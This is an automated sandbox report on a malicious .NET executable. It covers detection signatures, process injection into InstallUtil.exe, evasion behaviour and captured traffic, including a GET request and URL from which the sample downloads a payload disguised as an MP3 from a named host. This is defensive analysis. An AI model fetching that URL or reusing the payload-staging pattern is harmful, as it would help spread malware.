Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TiOWA908TP.exe

Overview

General Information

Sample name:TiOWA908TP.exe
renamed because original name is a hash value
Original sample name:f1bbcbcf580673f86692045f0e6c1141.exe
Analysis ID:1590837
MD5:f1bbcbcf580673f86692045f0e6c1141
SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • TiOWA908TP.exe (PID: 4456 cmdline: "C:\Users\user\Desktop\TiOWA908TP.exe" MD5: F1BBCBCF580673F86692045F0E6C1141)
    • InstallUtil.exe (PID: 6660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1148 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2482629176.0000000006FD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: TiOWA908TP.exe PID: 4456JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: TiOWA908TP.exe PID: 4456JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: InstallUtil.exe PID: 6660JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.TiOWA908TP.exe.6fd0000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.TiOWA908TP.exe.6fd0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: TiOWA908TP.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: TiOWA908TP.exeVirustotal: Detection: 18%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: TiOWA908TP.exeJoe Sandbox ML: detected
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbK source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb| source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.2478894252.0000000005970000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004281000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.2478894252.0000000005970000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004281000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbp{| source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbd source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb{ source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: b\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb\a%%A source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb4 source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbP source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb> source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb, source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb: source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb; source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb`z source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbXP| source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06FADCBAh0_2_06FADAE0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06FADCBAh0_2_06FADAD1
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06FAD3DFh0_2_06FAD380
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06FAD3DFh0_2_06FAD37F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 070835E3h0_2_07083663
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 070835E3h0_2_07083378
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: cud-senegal.org
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org
                Source: TiOWA908TP.exe, 00000000.00000002.2456307775.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org/
                Source: TiOWA908TP.exeString found in binary or memory: https://cud-senegal.org/post-postlogin/Gjflop.mp3
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D4790 NtProtectVirtualMemory,0_2_059D4790
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D8238 NtResumeThread,0_2_059D8238
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D4788 NtProtectVirtualMemory,0_2_059D4788
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D8230 NtResumeThread,0_2_059D8230
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_014027480_2_01402748
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_014027380_2_01402738
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D61080_2_059D6108
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D0F300_2_059D0F30
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D60F80_2_059D60F8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D38100_2_059D3810
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D68380_2_059D6838
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D38200_2_059D3820
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_059D0F220_2_059D0F22
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD55280_2_06CD5528
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD92630_2_06CD9263
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD78F30_2_06CD78F3
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CDF9C00_2_06CDF9C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD1A8F0_2_06CD1A8F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD1A980_2_06CD1A98
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CDD84B0_2_06CDD84B
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CDD8500_2_06CDD850
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06D2761F0_2_06D2761F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06D26F580_2_06D26F58
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06D26F680_2_06D26F68
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06D2E7000_2_06D2E700
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06D2E9380_2_06D2E938
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E3D4A50_2_06E3D4A5
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E333C00_2_06E333C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E315A80_2_06E315A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E315980_2_06E31598
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E34A080_2_06E34A08
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E300400_2_06E30040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E300070_2_06E30007
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06E3B1C00_2_06E3B1C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06FA9EB80_2_06FA9EB8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06FAF5700_2_06FAF570
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06FAF51B0_2_06FAF51B
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06FA8EA80_2_06FA8EA8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06FAF5630_2_06FAF563
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0708B5A80_2_0708B5A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070816400_2_07081640
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070816500_2_07081650
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0708B5980_2_0708B598
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B99900_2_070B9990
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070BA7080_2_070BA708
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B77EB0_2_070B77EB
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B77F80_2_070B77F8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B5E200_2_070B5E20
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070BA6F90_2_070BA6F9
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B99800_2_070B9980
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070BF1980_2_070BF198
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B00060_2_070B0006
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_070B00400_2_070B0040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_071CF9300_2_071CF930
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_071CDFD00_2_071CDFD0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_071B00130_2_071B0013
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_071B00400_2_071B0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_026610283_2_02661028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_026610183_2_02661018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1148
                Source: TiOWA908TP.exe, 00000000.00000002.2456307775.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2478894252.0000000005970000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000000.2192872486.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.000000000347A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004664000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.2481038167.0000000006B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNiiug.dll" vs TiOWA908TP.exe
                Source: TiOWA908TP.exeBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal88.evad.winEXE@4/0@1/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:64:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\514a5dc8-61f1-481c-9701-f30b6586a123Jump to behavior
                Source: TiOWA908TP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: TiOWA908TP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TiOWA908TP.exeVirustotal: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\TiOWA908TP.exe "C:\Users\user\Desktop\TiOWA908TP.exe"
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1148
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
